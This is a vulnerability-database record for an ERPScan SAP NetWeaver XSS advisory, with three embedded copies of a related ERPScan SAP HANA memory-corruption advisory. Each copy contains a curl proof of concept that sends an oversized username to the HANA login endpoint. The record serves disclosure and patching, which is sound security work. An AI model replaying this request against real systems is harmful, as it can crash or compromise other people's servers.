ID ERPSCAN-11-024 Type erpscan Reporter ERPScan Modified 2010-01-04T00:00:00
Description
Application: SAP NetWeaver Versions Affected: SAP NetWeaver Vendor URL:http://www.sap.com Bugs: Information disclose Exploits: YES Reported: 01.04.2010 Vendor response: 08.04.2010 Date of Public Advisory: 17.06.2011 CVSS: 5.0 Author:Dmitriy Chastuhin
Description
SAP NetWeaver performanceProviderRoot application has linked XSS vulnerability.
Business Risk
An attacker can use XSS vulnerability by sending a link on malicious script to an unaware user via an e-mail, messaging or social networks. The end user browser has no way to know that the script should not be trusted, and will execute the script. The malicious script can get an access to any cookies, session tokens, or other sensitive information retained by your browser and used with SAP web applications like Portal, CRM, SRM and others. This script can even rewrite the content of an HTML page. Thus, an attacker can gain access to user session and gain control on business-critical information which can be accessed by victim.
{"type": "erpscan", "published": "2010-01-04T00:00:00", "href": "https://erpscan.io/advisories/erpscan-11-024-sap-netwaver-performanceprovierroot-xss/", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:74663DFDB844377275EFF06FC83E2AFC"]}, {"type": "exploitdb", "idList": ["EDB-ID:39382"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135416"]}], "modified": "2020-09-17T14:41:50", "rev": 2}, "score": {"value": 0.3, "vector": "NONE", "modified": "2020-09-17T14:41:50", "rev": 2}, "vulnersScore": 0.3}, "lastseen": "2020-09-17T14:41:50", "viewCount": 4, "id": "ERPSCAN-11-024", "references": [], "edition": 4, "reporter": "ERPScan", "modified": "2010-01-04T00:00:00", "title": "SAP NetWeaver performanceProvierRoot - XSS", "description": "**Application:** SAP NetWeaver \n**Versions Affected:** SAP NetWeaver \n**Vendor URL:** [http://www.sap.com ](<http://www.sap.com>) \n**Bugs:** Information disclose \n**Exploits:** YES \n**Reported:** 01.04.2010 \n**Vendor response:** 08.04.2010 \n**Date of Public Advisory:** 17.06.2011 \n**CVSS: 5.0 \n** **Author:**Dmitriy Chastuhin\n\n**Description** \nSAP NetWeaver performanceProviderRoot application has linked XSS vulnerability.\n\n**Business Risk** \nAn attacker can use XSS vulnerability by sending a link on malicious script to an unaware user via an e-mail, messaging or social networks. The end user browser has no way to know that the script should not be trusted, and will execute the script. The malicious script can get an access to any cookies, session tokens, or other sensitive information retained by your browser and used with SAP web applications like Portal, CRM, SRM and others. This script can even rewrite the content of an HTML page. Thus, an attacker can gain access to user session and gain control on business-critical information which can be accessed by victim.\n", "scheme": null}
{"exploitdb": [{"lastseen": "2016-02-04T10:01:23", "description": "SAP HANA 1.00.095 - hdbindexserver Memory Corruption. CVE-2015-7986. Webapps exploits for multiple platform", "published": "2016-01-28T00:00:00", "type": "exploitdb", "title": "SAP HANA 1.00.095 - hdbindexserver Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7986"], "modified": "2016-01-28T00:00:00", "id": "EDB-ID:39382", "href": "https://www.exploit-db.com/exploits/39382/", "sourceData": "[ERPSCAN-15-024] SAP HANA hdbindexserver - Memory corruption\r\n\r\nApplication: SAP HANA\r\nVersions Affected: SAP HANA 1.00.095\r\nVendor URL: http://SAP.com\r\nBugs: Memory corruption, RCE\r\nReported: 17.07.2015\r\nVendor response: 18.07.2015\r\nDate of Public Advisory: 13.10.2015\r\nReference: SAP Security Note 2197428\r\nAuthor: Mathieu Geli (ERPScan)\r\n\r\n\r\nDescription\r\n\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: SAP HANA 1.00.095\r\nAdvisory ID: [ERPSCAN-15-024]\r\nRisk: Hight\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/\r\nDate published: 13.10.2015\r\nVendors contacted: SAP\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Memory corruption, RCE\r\nImpact: full system compromise\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-7986\r\nCVSS Information\r\nCVSS Base Score: 9.3 / 10\r\nCVSS Base Vector:\r\nAV : Access Vector (Related exploit range)\r\n Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality\r\n Complete (C)\r\nI : Impact to Integrity\r\n Complete (C)\r\nA : Impact to Availability\r\n Complete (C)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nA buffer overflow vulnerability exists in SAP HANA interface. If an\r\nattacker has a network access to the SQL interface or the SAP HANA\r\nExtended Application Services interface of an SAP HANA system, the\r\nvulnerability enables the attacker to inject code into the working\r\nmemory that is subsequently executed by the application. It can also\r\nbe used to cause a general fault in the product causing the product to\r\nterminate.\r\n\r\nProof of concept\r\n\r\nThis authentication request should be replayed 10 times.\r\n\r\ncurl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H\r\n'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H\r\n'X-csrf-token: unsafe' -d\r\n'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\r\n\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nSAP HANA 1.00.095.00\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nTo correct this vulnerability, install SAP Security Note 2197428\r\n\r\n\r\n6. AUTHOR\r\n\r\nMathieu Geli (ERPScan)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nAn anonymous attacker can use a special HTTP request to corrupt SAP\r\nHANA index server memory.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nSend: 17.07.2015\r\nReported: 17.07.2015\r\nVendor response: 18.07.2015\r\nDate of Public Advisory: 13.10.2015\r\n\r\n\r\n9. REFERENCES\r\n\r\nhttp://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\n\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is the most respected and credible Business Application\r\nSecurity provider. Founded in 2010, the company operates globally and\r\nenables large Oil and Gas, Financial and Retail organizations to\r\nsecure their mission-critical processes. Named as an \u2018Emerging Vendor\u2019\r\nin Security by CRN, listed among \u201cTOP 100 SAP Solution providers\u201d and\r\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE\r\npartner in discovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to assist in improving the\r\nsecurity of their latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security, and provide solutions to evaluate and secure SAP\r\nand Oracle ERP systems and business-critical applications from both,\r\ncyber-attacks as well as internal fraud. Usually our clients are large\r\nenterprises, Fortune 2000 companies and managed service providers\r\nwhose requirements are to actively monitor and manage security of vast\r\nSAP landscapes on a global scale.\r\nWe \u2018follow the sun\u2019 and function in two hubs, located in the Palo Alto\r\nand Amsterdam to provide threat intelligence services, agile support\r\nand operate local offices and partner network spanning 20+ countries\r\naround the globe.\r\n\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39382/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nSAP HANA 1.00.095 - hdbindexserver Memory Corruption", "edition": 1, "published": "2016-01-28T00:00:00", "title": "SAP HANA 1.00.095 - hdbindexserver Memory Corruption", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7986"], "modified": "2016-01-28T00:00:00", "id": "EXPLOITPACK:74663DFDB844377275EFF06FC83E2AFC", "href": "", "sourceData": "[ERPSCAN-15-024] SAP HANA hdbindexserver - Memory corruption\n\nApplication: SAP HANA\nVersions Affected: SAP HANA 1.00.095\nVendor URL: http://SAP.com\nBugs: Memory corruption, RCE\nReported: 17.07.2015\nVendor response: 18.07.2015\nDate of Public Advisory: 13.10.2015\nReference: SAP Security Note 2197428\nAuthor: Mathieu Geli (ERPScan)\n\n\nDescription\n\n\n1. ADVISORY INFORMATION\n\nTitle: SAP HANA 1.00.095\nAdvisory ID: [ERPSCAN-15-024]\nRisk: Hight\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/\nDate published: 13.10.2015\nVendors contacted: SAP\n\n2. VULNERABILITY INFORMATION\n\nClass: Memory corruption, RCE\nImpact: full system compromise\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2015-7986\nCVSS Information\nCVSS Base Score: 9.3 / 10\nCVSS Base Vector:\nAV : Access Vector (Related exploit range)\n Network (N)\nAC : Access Complexity (Required attack complexity) Medium (M)\nAu : Authentication (Level of authentication needed to exploit) None (N)\nC : Impact to Confidentiality\n Complete (C)\nI : Impact to Integrity\n Complete (C)\nA : Impact to Availability\n Complete (C)\n\n3. VULNERABILITY DESCRIPTION\n\nA buffer overflow vulnerability exists in SAP HANA interface. If an\nattacker has a network access to the SQL interface or the SAP HANA\nExtended Application Services interface of an SAP HANA system, the\nvulnerability enables the attacker to inject code into the working\nmemory that is subsequently executed by the application. It can also\nbe used to cause a general fault in the product causing the product to\nterminate.\n\nProof of concept\n\nThis authentication request should be replayed 10 times.\n\ncurl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H\n'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H\n'X-csrf-token: unsafe' -d\n'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'\n\n\n\n4. VULNERABLE PACKAGES\n\nSAP HANA 1.00.095.00\nOther versions are probably affected too, but they were not checked.\n\n\n5. SOLUTIONS AND WORKAROUNDS\n\nTo correct this vulnerability, install SAP Security Note 2197428\n\n\n6. AUTHOR\n\nMathieu Geli (ERPScan)\n\n\n7. TECHNICAL DESCRIPTION\n\nAn anonymous attacker can use a special HTTP request to corrupt SAP\nHANA index server memory.\n\n\n8. REPORT TIMELINE\n\nSend: 17.07.2015\nReported: 17.07.2015\nVendor response: 18.07.2015\nDate of Public Advisory: 13.10.2015\n\n\n9. REFERENCES\n\nhttp://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/\n\n\n10. ABOUT ERPScan Research\n\nThe company\u2019s expertise is based on the research subdivision of\nERPScan, which is engaged in vulnerability research and analysis of\ncritical enterprise applications. It has achieved multiple\nacknowledgments from the largest software vendors like SAP, Oracle,\nMicrosoft, IBM, VMware, HP for discovering more than 400\nvulnerabilities in their solutions (200 of them just in SAP!).\nERPScan researchers are proud to have exposed new types of\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\nnominated for the best server-side vulnerability at BlackHat 2013.\nERPScan experts have been invited to speak, present, and train at 60+\nprime international security conferences in 25+ countries across the\ncontinents. These include BlackHat, RSA, HITB, and private SAP\ntrainings in several Fortune 2000 companies.\nERPScan researchers lead the project EAS-SEC, which is focused on\nenterprise application security research and awareness. They have\npublished 3 exhaustive annual award-winning surveys about SAP\nsecurity.\nERPScan experts have been interviewed by leading media resources and\nfeatured in specialized info-sec publications worldwide. These include\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\nHeise, and Chinabyte, to name a few.\nWe have highly qualified experts in staff with experience in many\ndifferent fields of security, from web applications and\nmobile/embedded to reverse engineering and ICS/SCADA systems,\naccumulating their experience to conduct the best SAP security\nresearch.\n\n\n11. ABOUT ERPScan\nERPScan is the most respected and credible Business Application\nSecurity provider. Founded in 2010, the company operates globally and\nenables large Oil and Gas, Financial and Retail organizations to\nsecure their mission-critical processes. Named as an \u2018Emerging Vendor\u2019\nin Security by CRN, listed among \u201cTOP 100 SAP Solution providers\u201d and\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE\npartner in discovering and resolving security vulnerabilities. ERPScan\nconsultants work with SAP SE in Walldorf to assist in improving the\nsecurity of their latest solutions.\nERPScan\u2019s primary mission is to close the gap between technical and\nbusiness security, and provide solutions to evaluate and secure SAP\nand Oracle ERP systems and business-critical applications from both,\ncyber-attacks as well as internal fraud. Usually our clients are large\nenterprises, Fortune 2000 companies and managed service providers\nwhose requirements are to actively monitor and manage security of vast\nSAP landscapes on a global scale.\nWe \u2018follow the sun\u2019 and function in two hubs, located in the Palo Alto\nand Amsterdam to provide threat intelligence services, agile support\nand operate local offices and partner network spanning 20+ countries\naround the globe.\n\n\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\nPhone: 650.798.5255\nTwitter: @erpscan\nScoop-it: Business Application Security", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:43", "description": "", "published": "2016-01-27T00:00:00", "type": "packetstorm", "title": "SAP HANA hdbindexserver Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7986"], "modified": "2016-01-27T00:00:00", "id": "PACKETSTORM:135416", "href": "https://packetstormsecurity.com/files/135416/SAP-HANA-hdbindexserver-Memory-Corruption.html", "sourceData": "`[ERPSCAN-15-024] SAP HANA hdbindexserver - Memory corruption \n \n \nApplication: SAP HANA \nVersions Affected: SAP HANA 1.00.095 \nVendor URL: http://SAP.com \nBugs: Memory corruption, RCE \nReported: 17.07.2015 \nVendor response: 18.07.2015 \nDate of Public Advisory: 13.10.2015 \nReference: SAP Security Note 2197428 \nAuthor: Mathieu Geli (ERPScan) \n \n \n \nDescription \n \n \n1. ADVISORY INFORMATION \n \nTitle: SAP HANA 1.00.095 \nAdvisory ID: [ERPSCAN-15-024] \nRisk: Hight \nAdvisory URL: http://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/ \nDate published: 13.10.2015 \nVendors contacted: SAP \n \n2. VULNERABILITY INFORMATION \n \nClass: Memory corruption, RCE \nImpact: full system compromise \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2015-7986 \nCVSS Information \nCVSS Base Score: 9.3 / 10 \nCVSS Base Vector: \nAV : Access Vector (Related exploit range) \nNetwork (N) \nAC : Access Complexity (Required attack complexity) Medium (M) \nAu : Authentication (Level of authentication needed to exploit) None (N) \nC : Impact to Confidentiality \nComplete (C) \nI : Impact to Integrity \nComplete (C) \nA : Impact to Availability \nComplete (C) \n \n \n \n \n \n \n3. VULNERABILITY DESCRIPTION \n \nA buffer overflow vulnerability exists in SAP HANA interface. If an \nattacker has a network access to the SQL interface or the SAP HANA \nExtended Application Services interface of an SAP HANA system, the \nvulnerability enables the attacker to inject code into the working \nmemory that is subsequently executed by the application. It can also \nbe used to cause a general fault in the product causing the product to \nterminate. \n \nProof of concept \n \nThis authentication request should be replayed 10 times. \n \ncurl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H \n'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H \n'X-csrf-token: unsafe' -d \n'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \n \n \n \n4. VULNERABLE PACKAGES \n \nSAP HANA 1.00.095.00 \nOther versions are probably affected too, but they were not checked. \n \n \n5. SOLUTIONS AND WORKAROUNDS \n \nTo correct this vulnerability, install SAP Security Note 2197428 \n \n \n6. AUTHOR \n \nMathieu Geli (ERPScan) \n \n \n7. TECHNICAL DESCRIPTION \n \nAn anonymous attacker can use a special HTTP request to corrupt SAP \nHANA index server memory. \n \n \n \n \n8. REPORT TIMELINE \n \nSend: 17.07.2015 \nReported: 17.07.2015 \nVendor response: 18.07.2015 \nDate of Public Advisory: 13.10.2015 \n \n \n9. REFERENCES \n \nhttp://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/ \n \n10. ABOUT ERPScan Research \n \nThe company\u2019s expertise is based on the research subdivision of \nERPScan, which is engaged in vulnerability research and analysis of \ncritical enterprise applications. It has achieved multiple \nacknowledgments from the largest software vendors like SAP, Oracle, \nMicrosoft, IBM, VMware, HP for discovering more than 400 \nvulnerabilities in their solutions (200 of them just in SAP!). \nERPScan researchers are proud to have exposed new types of \nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be \nnominated for the best server-side vulnerability at BlackHat 2013. \nERPScan experts have been invited to speak, present, and train at 60+ \nprime international security conferences in 25+ countries across the \ncontinents. These include BlackHat, RSA, HITB, and private SAP \ntrainings in several Fortune 2000 companies. \nERPScan researchers lead the project EAS-SEC, which is focused on \nenterprise application security research and awareness. They have \npublished 3 exhaustive annual award-winning surveys about SAP \nsecurity. \nERPScan experts have been interviewed by leading media resources and \nfeatured in specialized info-sec publications worldwide. These include \nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, \nHeise, and Chinabyte, to name a few. \nWe have highly qualified experts in staff with experience in many \ndifferent fields of security, from web applications and \nmobile/embedded to reverse engineering and ICS/SCADA systems, \naccumulating their experience to conduct the best SAP security \nresearch. \n \n \n11. ABOUT ERPScan \nERPScan is the most respected and credible Business Application \nSecurity provider. Founded in 2010, the company operates globally and \nenables large Oil and Gas, Financial and Retail organizations to \nsecure their mission-critical processes. Named as an \u2018Emerging Vendor\u2019 \nin Security by CRN, listed among \u201cTOP 100 SAP Solution providers\u201d and \ndistinguished by 30+ other awards, ERPScan is the leading SAP SE \npartner in discovering and resolving security vulnerabilities. ERPScan \nconsultants work with SAP SE in Walldorf to assist in improving the \nsecurity of their latest solutions. \nERPScan\u2019s primary mission is to close the gap between technical and \nbusiness security, and provide solutions to evaluate and secure SAP \nand Oracle ERP systems and business-critical applications from both, \ncyber-attacks as well as internal fraud. Usually our clients are large \nenterprises, Fortune 2000 companies and managed service providers \nwhose requirements are to actively monitor and manage security of vast \nSAP landscapes on a global scale. \nWe \u2018follow the sun\u2019 and function in two hubs, located in the Palo Alto \nand Amsterdam to provide threat intelligence services, agile support \nand operate local offices and partner network spanning 20+ countries \naround the globe. \n \n \nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 \nPhone: 650.798.5255 \nTwitter: @erpscan \nScoop-it: Business Application Security \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135416/ERPSCAN-15-024.txt"}]}